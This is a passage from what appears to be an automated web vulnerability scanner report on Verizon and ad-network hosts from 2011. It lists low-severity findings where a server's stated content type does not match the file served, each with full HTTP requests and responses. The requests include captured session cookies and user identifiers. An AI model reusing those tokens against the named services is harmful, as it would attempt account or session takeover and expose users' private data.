Cookie: V1Z2=0; mp__utma=48181944.1605757161.1315237028.1315237028.1315237028.1; mp__utmz=48181944.1315237028.1.2.utmccn=(referral)|utmcsr=wireless.amazon.com|utmcct=/help/200307920/ref=bp_hp_br|utmcmd=referral; mbox=session#1315237011507-275926#1315239441|PC#1315237011507-275926.17#1316447181|check#true#1315237641

Response

HTTP/1.1 200 OK
Server: None
Content-Type: text/plain
Last-Modified: Thu, 25 Aug 2011 03:53:39 GMT
Content-Length: 55680
ETag: "d980-4e55c743"
Accept-Ranges: bytes
Date: Mon, 05 Sep 2011 22:16:56 GMT
Connection: close

FWS    .......e....@..4.D.....C............Scene 1.............e....@........    .....A    .....\n.L...J`.i.....F....................Exif..II*.................Ducky.......L.....ohttp://ns.adobe.com/xap/1.0/.<
...[SNIP]...

26.7. http://cache.vzw.com/images_b2c/flash_containers/hpMarquee/images/business/biz_tablets_072511.swf

Summary

Severity:   Information
Confidence:   Firm
Host:   http://cache.vzw.com
Path:   /images_b2c/flash_containers/hpMarquee/images/business/biz_tablets_072511.swf

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain a flash object.

Request

GET /images_b2c/flash_containers/hpMarquee/images/business/biz_tablets_072511.swf HTTP/1.1
Host: cache.vzw.com
Proxy-Connection: keep-alive
Referer: http://cache.vzw.com/images_b2c/flash_containers/hpMarquee/swf/tab_slider.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: V1Z2=0; mp__utma=48181944.1605757161.1315237028.1315237028.1315237028.1; mp__utmz=48181944.1315237028.1.2.utmccn=(referral)|utmcsr=wireless.amazon.com|utmcct=/help/200307920/ref=bp_hp_br|utmcmd=referral; mbox=session#1315237011507-275926#1315239441|PC#1315237011507-275926.17#1316447181|check#true#1315237641

Response

HTTP/1.1 200 OK
Server: None
Content-Type: text/plain
Last-Modified: Thu, 25 Aug 2011 03:53:39 GMT
Content-Length: 47236
ETag: "b884-4e55c743"
Accept-Ranges: bytes
Date: Mon, 05 Sep 2011 22:16:58 GMT
Connection: close

FWS    .......e....@..4.D.....C............Scene 1.............e....@........    .....A    .....\n.L...J`.i.....F....................Exif..II*.................Ducky.......<.....ohttp://ns.adobe.com/xap/1.0/.<
...[SNIP]...

26.8. http://cache.vzw.com/images_b2c/flash_containers/hpMarquee/images/business/global_business_072511.swf

Summary

Severity:   Information
Confidence:   Firm
Host:   http://cache.vzw.com
Path:   /images_b2c/flash_containers/hpMarquee/images/business/global_business_072511.swf

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain a flash object.

Request

GET /images_b2c/flash_containers/hpMarquee/images/business/global_business_072511.swf HTTP/1.1
Host: cache.vzw.com
Proxy-Connection: keep-alive
Referer: http://cache.vzw.com/images_b2c/flash_containers/hpMarquee/swf/tab_slider.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: V1Z2=0; mp__utma=48181944.1605757161.1315237028.1315237028.1315237028.1; mp__utmz=48181944.1315237028.1.2.utmccn=(referral)|utmcsr=wireless.amazon.com|utmcct=/help/200307920/ref=bp_hp_br|utmcmd=referral; mbox=session#1315237011507-275926#1315239441|PC#1315237011507-275926.17#1316447181|check#true#1315237641

Response

HTTP/1.1 200 OK
Server: None
Content-Type: text/plain
Last-Modified: Tue, 30 Aug 2011 16:28:47 GMT
Content-Length: 57837
ETag: "e1ed-4e5d0fbf"
Accept-Ranges: bytes
Date: Mon, 05 Sep 2011 22:16:59 GMT
Connection: close

FWS    .......e....@..4.D.....C............Scene 1.............e....@........    .....A    .....\n.L...J`.i.....F....................JFIF.............C..........
.    ......    ....
...............    
   ..........
...[SNIP]...

26.9. http://cache.vzw.com/images_b2c/flash_containers/hpMarquee/images/business/gopayments_082511.swf

Summary

Severity:   Information
Confidence:   Firm
Host:   http://cache.vzw.com
Path:   /images_b2c/flash_containers/hpMarquee/images/business/gopayments_082511.swf

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain a Flash object.

Request

GET /images_b2c/flash_containers/hpMarquee/images/business/gopayments_082511.swf HTTP/1.1
Host: cache.vzw.com
Proxy-Connection: keep-alive
Referer: http://cache.vzw.com/images_b2c/flash_containers/hpMarquee/swf/tab_slider.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: V1Z2=0; mp__utma=48181944.1605757161.1315237028.1315237028.1315237028.1; mp__utmz=48181944.1315237028.1.2.utmccn=(referral)|utmcsr=wireless.amazon.com|utmcct=/help/200307920/ref=bp_hp_br|utmcmd=referral; mbox=session#1315237011507-275926#1315239441|PC#1315237011507-275926.17#1316447181|check#true#1315237641

Response

HTTP/1.1 200 OK
Server: None
Content-Type: text/plain
Last-Modified: Thu, 25 Aug 2011 03:53:39 GMT
Content-Length: 60068
ETag: "eaa4-4e55c743"
Accept-Ranges: bytes
Date: Mon, 05 Sep 2011 22:16:53 GMT
Connection: close

FWS    .......e....@..4.D.....C............Scene 1.............e....@........    .....A    .....\n.L...J`.i.....F....................JFIF.............C...........    ........    ...        .....    ..    .....        ...    ........    ..
...[SNIP]...

26.10. http://cache.vzw.com/images_b2c/flash_containers/hpMarquee/images/business/latestdevices_071911.swf

Summary

Severity:   Information
Confidence:   Firm
Host:   http://cache.vzw.com
Path:   /images_b2c/flash_containers/hpMarquee/images/business/latestdevices_071911.swf

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain a Flash object.

Request

GET /images_b2c/flash_containers/hpMarquee/images/business/latestdevices_071911.swf HTTP/1.1
Host: cache.vzw.com
Proxy-Connection: keep-alive
Referer: http://cache.vzw.com/images_b2c/flash_containers/hpMarquee/swf/tab_slider.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: V1Z2=0; mp__utma=48181944.1605757161.1315237028.1315237028.1315237028.1; mp__utmz=48181944.1315237028.1.2.utmccn=(referral)|utmcsr=wireless.amazon.com|utmcct=/help/200307920/ref=bp_hp_br|utmcmd=referral; mbox=session#1315237011507-275926#1315239441|PC#1315237011507-275926.17#1316447181|check#true#1315237641

Response

HTTP/1.1 200 OK
Server: None
Content-Type: text/plain
Last-Modified: Thu, 25 Aug 2011 03:53:39 GMT
Content-Length: 54462
ETag: "d4be-4e55c743"
Accept-Ranges: bytes
Date: Mon, 05 Sep 2011 22:16:57 GMT
Connection: close

FWS    .......e....@..4.D.....C............Scene 1.............e....@........    .....A    .....\n.L...J`.i.....F........F...........Exif..II*.................Ducky.......<.....ohttp://ns.adobe.com/xap/1.0/.<
...[SNIP]...

26.11. http://cache.vzw.com/images_b2c/flash_containers/hpMarquee/swf/tab_slider.swf

Summary

Severity:   Information
Confidence:   Firm
Host:   http://cache.vzw.com
Path:   /images_b2c/flash_containers/hpMarquee/swf/tab_slider.swf

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain a Flash object.

Request

GET /images_b2c/flash_containers/hpMarquee/swf/tab_slider.swf HTTP/1.1
Host: cache.vzw.com
Proxy-Connection: keep-alive
Referer: http://www.verizonwireless.com/b2c/index.html?tab=business
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: V1Z2=0; mp__utma=48181944.1605757161.1315237028.1315237028.1315237028.1; mp__utmz=48181944.1315237028.1.2.utmccn=(referral)|utmcsr=wireless.amazon.com|utmcct=/help/200307920/ref=bp_hp_br|utmcmd=referral; mbox=session#1315237011507-275926#1315239441|PC#1315237011507-275926.17#1316447181|check#true#1315237641

Response

HTTP/1.1 200 OK
Server: None
Content-Type: text/plain
Last-Modified: Fri, 10 Sep 2010 18:24:54 GMT
Content-Length: 18731
ETag: "492b-4c8a77f6"
Accept-Ranges: bytes
Date: Mon, 05 Sep 2011 22:16:44 GMT
Connection: close

CWS    ....x....|.E.7..>M..".$NW.b'F....r@.!N!..4r...#Y..nXr
.wN ......@(......fI...v.q.Q.......b'..{...'...........>.L....$....qL:..!I.\>00.s..E&-..[....4`8..I.!....,...jm..[.K.J......NiY....Mh..z....a.
...[SNIP]...

26.12. http://cache.vzw.com/images_b2c/homepage/biz_marquee_verticals.swf

Summary

Severity:   Information
Confidence:   Firm
Host:   http://cache.vzw.com
Path:   /images_b2c/homepage/biz_marquee_verticals.swf

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain a Flash object.

Request

GET /images_b2c/homepage/biz_marquee_verticals.swf HTTP/1.1
Host: cache.vzw.com
Proxy-Connection: keep-alive
Referer: http://www.verizonwireless.com/b2c/index.html?tab=business
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: V1Z2=0; mp__utma=48181944.1605757161.1315237028.1315237028.1315237028.1; mp__utmz=48181944.1315237028.1.2.utmccn=(referral)|utmcsr=wireless.amazon.com|utmcct=/help/200307920/ref=bp_hp_br|utmcmd=referral; mbox=session#1315237011507-275926#1315239441|PC#1315237011507-275926.17#1316447181|check#true#1315237641

Response

HTTP/1.1 200 OK
Server: None
Content-Type: text/plain
Last-Modified: Wed, 03 Aug 2011 16:22:42 GMT
Content-Length: 107857
ETag: "1a551-4e3975d2"
Accept-Ranges: bytes
Date: Mon, 05 Sep 2011 22:16:44 GMT
Connection: close

CWS    n...x.l.eP.L.....n.....u..5...I...tq.....    .!@p..`......[.V...T.....>==R3.......z.....L...J....9..?..x.....(..........PC..
@A......@    ..?.@..#h.h...BEE............h.G.k.....D.B..0..s`a.@..C0..@G..
...[SNIP]...

26.13. http://cache.vzw.com/testNtarget/thin_omninav2.0.4.js

Summary

Severity:   Information
Confidence:   Firm
Host:   http://cache.vzw.com
Path:   /testNtarget/thin_omninav2.0.4.js

Issue detail

The response contains the following Content-type statement:

Content-Type: application/x-javascript

The response states that it contains script. However, it actually appears to contain unrecognised content.

Request

GET /testNtarget/thin_omninav2.0.4.js HTTP/1.1
Host: cache.vzw.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.verizonwireless.com/b2c/index.html
Cookie: V1Z2=3Xxb5cGQpT1L4o_oOLroIebqfANPB4UFu_z48jlyljwyA3Qbv3rwiCA

Response

HTTP/1.1 200 OK
Server: None
Content-Type: application/x-javascript
Last-Modified: Thu, 12 May 2011 12:23:26 GMT
ETag: "2dc9-4dcbd13e"
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 11721
Date: Mon, 05 Sep 2011 22:14:48 GMT
Connection: close

O="context.checkS.match.part.if(.et.results.){var .Sizzl.expr.ele.){..length.functi.Expr..type.===.;}.for(var.r.urn .isXML..on(.[i].re.curLoop.s.ctor.ilter.heck.ode.tr.isPartS..nQTyp.=null.else.und...
...[SNIP]...

26.14. http://cdn.flashtalking.com/container/vrzmvo/vrzmvo_cont_FIOSTVFeaturesPage.js

Summary

Severity:   Information
Confidence:   Firm
Host:   http://cdn.flashtalking.com
Path:   /container/vrzmvo/vrzmvo_cont_FIOSTVFeaturesPage.js

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain script.

Request

GET /container/vrzmvo/vrzmvo_cont_FIOSTVFeaturesPage.js HTTP/1.1
Host: cdn.flashtalking.com
Proxy-Connection: keep-alive
Referer: http://fls.doubleclick.net/activityi;src=2761768;type=consu459;cat=fiost917;ord=789927707519.3822?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: flashtalkingad1="GUID=1343AC00FD7B0F|segment=(adg-t:1343)"

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 21:30:24 GMT
Server: AmazonS3
Content-Type: text/plain
Last-Modified: Fri, 12 Aug 2011 11:21:40 GMT
ETag: "a03a4bb695d6236eb304ab091c3bbfa8"
x-amz-id-2: DHsRdUKVYST6JqEHqCGOa/F3IASvQ9gMhTo8+j6nLRsFT7GNkVMtVTiD+AHf8mq7
x-amz-request-id: BB35E40DC6E81580
Age: 2889
Via: HTTP/1.1 cdn.flashtalking.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet.
Expires: Mon, 05 Sep 2011 22:30:24 GMT
Cache-Control: max-age=3600
Via: 1.1 bos107105 (MII-APC/2.1)
x-mii-cache-hit: 1
Content-Length: 1892

//9-8-2011

document.write("<script id='segmentHolder' type='text/javascript' onload='segmentLoadFunc()' src='http://servedby.flashtalking.com/segment/read/;;javascript/?test'></script>");
segment
...[SNIP]...

26.15. http://cdn.flashtalking.com/container/vrzmvo/vrzmvo_cont_VerizoncomHomepage.js

Summary

Severity:   Information
Confidence:   Firm
Host:   http://cdn.flashtalking.com
Path:   /container/vrzmvo/vrzmvo_cont_VerizoncomHomepage.js

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain script.

Request

GET /container/vrzmvo/vrzmvo_cont_VerizoncomHomepage.js HTTP/1.1
Host: cdn.flashtalking.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://fls.doubleclick.net/activityi;src=2761768;type=consu459;cat=veriz742;ord=3888297551964.5366?
Cookie: flashtalkingad1="GUID=13153E27A6C6C8"

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 21:38:43 GMT
Server: AmazonS3
Content-Type: text/plain
Last-Modified: Fri, 12 Aug 2011 11:21:54 GMT
ETag: "5c56796626f1219d6805f04d41bfea9f"
x-amz-id-2: V4mVXqWtv+ViAxQHwVq+wMlBhT4tB4OVZsTBmpQkHGt05XOjtqu8mjErydc/B7VQ
x-amz-request-id: 88CCB459978E4F75
Age: 2156
Via: HTTP/1.1 cdn.flashtalking.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet.
Expires: Mon, 05 Sep 2011 22:38:43 GMT
Cache-Control: max-age=3600
Via: 1.1 bos107106000000 (MII-APC/2.1)
x-mii-cache-hit: 1
Content-Length: 1898

//9-8-2011

document.write("<script id='segmentHolder' type='text/javascript' onload='segmentLoadFunc()' src='http://servedby.flashtalking.com/segment/read/;;javascript/?test'></script>");
segment
...[SNIP]...

26.16. https://collaborateext.verizon.com/aims/encore/VZCTC.serv

Summary

Severity:   Information
Confidence:   Firm
Host:   https://collaborateext.verizon.com
Path:   /aims/encore/VZCTC.serv

Issue detail

The response contains the following Content-type statement:

Content-type: text/html; charset=ISO-8859-1

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /aims/encore/VZCTC.serv HTTP/1.1
Host: collaborateext.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Mon, 05 Sep 2011 22:34:44 GMT
Content-length: 35
Content-type: text/html; charset=ISO-8859-1
P3P: CP='NOI ADM DEV PSAi COM NAV OUR OTR STP IND DEM'
X-Powered-By: Servlet/2.5 JSP/2.1


Invalid Request

26.17. https://collaborateext.verizon.com/pre/pre/pre.serv

Summary

Severity:   Information
Confidence:   Firm
Host:   https://collaborateext.verizon.com
Path:   /pre/pre/pre.serv

Issue detail

The response contains the following Content-type statement:

Content-type: image/jpeg, image/gif

The response states that it contains a JPEG image. However, it actually appears to contain a GIF image.

Request

GET /pre/pre/pre.serv?url=https%3A//signin.verizon.com/sso/ResetAccount%3FgoFlow%3DresetAccount&title=Sign%20In&topWinTitle=&id=7546147205&cmdName=FiosOR7001&cookie=12cTTlLQWJpG2WdmJ1n56z6lq4l7wM5TLkNq6z2RgpLJn697v8l1%21-1788495886%21154656592&stage=start&lastAction=none&timestamp=1315280303185&aimsHostVars=aimsChatCreditFlow__-1&referrer=https%3A//collaborateext.verizon.com/aims/encore/VzVAgent.jsp%3FuserId%3DEncoreSESS-EXT-PRODUCTION88049%26encUserId%3DGUmEyiQO9Y8UAztLasJjclKjsdj1czmHQ4i+eXEUNLY%3D HTTP/1.1
Host: collaborateext.verizon.com
Connection: keep-alive
Referer: https://signin.verizon.com/sso/ResetAccount?goFlow=resetAccount
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: preltvst=274600320~50.23.123.106~1315261452974; TMP_CK_AIMSPRESESSIONIDSIT=wJ75TlMM0FLQB8Bg9MqB6cJ9PPhDLLFCYyfFGZ3TqJLQN0GVvhMK; AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BTagRequired=N; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; dtCookie=8C98328CB529EE605B41B254E42B3E4A; dtLatCT=1315279121983|1|297; dtSa=-; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; BusinessUnit=residential; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; vsrecentsearches=oss%20sq~wss~xss~xss%20sq~; AIMSSESSIONID=12cTTlLQWJpG2WdmJ1n56z6lq4l7wM5TLkNq6z2RgpLJn697v8l1!-1788495886!154656592; NSC_dpmmbcfyubjnt_mcw=ffffffff8f64125045525d5f4f58455e445a4a422971; NSC_dpmmbcfyuqsf_mcw=ffffffff8f64125045525d5f4f58455e445a4a422995; AIMSPRESESSIONIDSIT=wJ75TlMM0FLQB8Bg9MqB6cJ9PPhDLLFCYyfFGZ3TqJLQN0GVvhMK!-1943483601!NONE; vzapps=ZIPCODE=10010; BPSPANISH=N; GBEOrdering=bannerid=vV8XV5a0k7UNCz0F4NS1Yy2ziu6e3G%2bpRnXX9Ts76mA%3d&redesignEnableFlag=YwUZzUxkyzg%3d&BundlesLP=is8rk0bMpSoz7R1F9vU7oNxRo1ehh781lEbxvp7l2Hs%3d; vzAppID=; LOB_CATEGORY=; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Mon, 05 Sep 2011 22:38:22 GMT
Content-length: 807
Content-type: image/jpeg, image/gif
Cache-Control: no-cache
P3P: CP='NOI ADM DEV PSAi COM NAV OUR OTR STP IND DEM'
X-Powered-By: Servlet/2.5 JSP/2.1

GIF87a.....................................@ .` .. .. .. .. ..@. @.@@.`@..@..@..@..@..`. `.@`.``..`..`..`..`.... ..@..`................. ..@..`................. ..@..`................. ..@..`.........
...[SNIP]...

26.18. https://enterprisecenter.verizon.com/enterprisesolutions/Default/tiles/LoginFlash/fonts/fonts_en.swf

Summary

Severity:   Information
Confidence:   Firm
Host:   https://enterprisecenter.verizon.com
Path:   /enterprisesolutions/Default/tiles/LoginFlash/fonts/fonts_en.swf

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain a Flash object.

Request

GET /enterprisesolutions/Default/tiles/LoginFlash/fonts/fonts_en.swf HTTP/1.1
Host: enterprisecenter.verizon.com
Connection: keep-alive
Referer: https://enterprisecenter.verizon.com/enterprisesolutions/Default/tiles/LoginFlash/vec_login_homepage_2010_preloader.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BTagRequired=N; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; dtCookie=8C98328CB529EE605B41B254E42B3E4A; dtLatCT=1315279121983|1|297; dtSa=-; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; BusinessUnit=residential; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; vsrecentsearches=oss%20sq~wss~xss~xss%20sq~; ED_SESSIONID=3lFzTlLPn3bjF74TvQ5hvTpG1NLZY6Ch55LynGnzjv4vbJTbpJTL!1857010759!-559043164; pref_lang=en-US; AIMSSESSIONID=12cTTlLQWJpG2WdmJ1n56z6lq4l7wM5TLkNq6z2RgpLJn697v8l1!-1788495886!154656592; AIMSPRESESSIONIDSIT=wJ75TlMM0FLQB8Bg9MqB6cJ9PPhDLLFCYyfFGZ3TqJLQN0GVvhMK!-1943483601!NONE; vzapps=ZIPCODE=10010; BPSPANISH=N; GBEOrdering=bannerid=vV8XV5a0k7UNCz0F4NS1Yy2ziu6e3G%2bpRnXX9Ts76mA%3d&redesignEnableFlag=YwUZzUxkyzg%3d&BundlesLP=is8rk0bMpSoz7R1F9vU7oNxRo1ehh781lEbxvp7l2Hs%3d; vzAppID=; LOB_CATEGORY=; CP=null*; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Content-Type: text/plain
Last-Modified: Sun, 17 Jul 2011 07:09:34 GMT
ETag: W/"cbd8-4e228aae"
Vary: accept-encoding
Date: Mon, 05 Sep 2011 22:26:39 GMT
Content-Length: 52184
Connection: keep-alive

CWS    ....x..{w\....&.. .    
...JSzh.!.$..Ez......D..J..7E...".B...(....(.'...|....../.Lfggwgw.>.$.?...*....6.'. .....J..Y%..iT...o...MU.=(._IJ*44T2TV./.M.............!.x.7.1L.7._X...m.@.... .?_....._p..
...[SNIP]...

26.19. https://enterprisecenter.verizon.com/enterprisesolutions/Default/tiles/LoginFlash/swf/AB_heroGraphic_en.swf

Summary

Severity:   Information
Confidence:   Firm
Host:   https://enterprisecenter.verizon.com
Path:   /enterprisesolutions/Default/tiles/LoginFlash/swf/AB_heroGraphic_en.swf

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain a Flash object.

Request

GET /enterprisesolutions/Default/tiles/LoginFlash/swf/AB_heroGraphic_en.swf HTTP/1.1
Host: enterprisecenter.verizon.com
Connection: keep-alive
Referer: https://enterprisecenter.verizon.com/enterprisesolutions/Default/tiles/LoginFlash/vec_login_homepage_2010_preloader.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BTagRequired=N; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; dtCookie=8C98328CB529EE605B41B254E42B3E4A; dtLatCT=1315279121983|1|297; dtSa=-; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; BusinessUnit=residential; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; vsrecentsearches=oss%20sq~wss~xss~xss%20sq~; ED_SESSIONID=3lFzTlLPn3bjF74TvQ5hvTpG1NLZY6Ch55LynGnzjv4vbJTbpJTL!1857010759!-559043164; pref_lang=en-US; AIMSSESSIONID=12cTTlLQWJpG2WdmJ1n56z6lq4l7wM5TLkNq6z2RgpLJn697v8l1!-1788495886!154656592; AIMSPRESESSIONIDSIT=wJ75TlMM0FLQB8Bg9MqB6cJ9PPhDLLFCYyfFGZ3TqJLQN0GVvhMK!-1943483601!NONE; vzapps=ZIPCODE=10010; BPSPANISH=N; GBEOrdering=bannerid=vV8XV5a0k7UNCz0F4NS1Yy2ziu6e3G%2bpRnXX9Ts76mA%3d&redesignEnableFlag=YwUZzUxkyzg%3d&BundlesLP=is8rk0bMpSoz7R1F9vU7oNxRo1ehh781lEbxvp7l2Hs%3d; vzAppID=; LOB_CATEGORY=; CP=null*; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Content-Type: text/plain
Last-Modified: Sun, 17 Jul 2011 07:09:35 GMT
ETag: W/"11c07-4e228aaf"
Vary: accept-encoding
Content-Length: 72711
Date: Mon, 05 Sep 2011 22:26:50 GMT
Connection: keep-alive

CWS
....x....X.].6|..))#...twJ...)..J#..tw+.t.H..........}...........\....Z.Z{....a....@qK.5...'.. .......l.Du.. ...n..._...>>..\\.....|..^.\<"""\..\...p..@7....7o:ZI...............me...#AK..m...?
...[SNIP]...

26.20. https://enterprisecenter.verizon.com/enterprisesolutions/Default/tiles/LoginFlash/vec_login_homepage_2010.swf

Summary

Severity:   Information
Confidence:   Firm
Host:   https://enterprisecenter.verizon.com
Path:   /enterprisesolutions/Default/tiles/LoginFlash/vec_login_homepage_2010.swf

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain a Flash object.

Request

GET /enterprisesolutions/Default/tiles/LoginFlash/vec_login_homepage_2010.swf HTTP/1.1
Host: enterprisecenter.verizon.com
Connection: keep-alive
Referer: https://enterprisecenter.verizon.com/enterprisesolutions/Default/tiles/LoginFlash/vec_login_homepage_2010_preloader.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
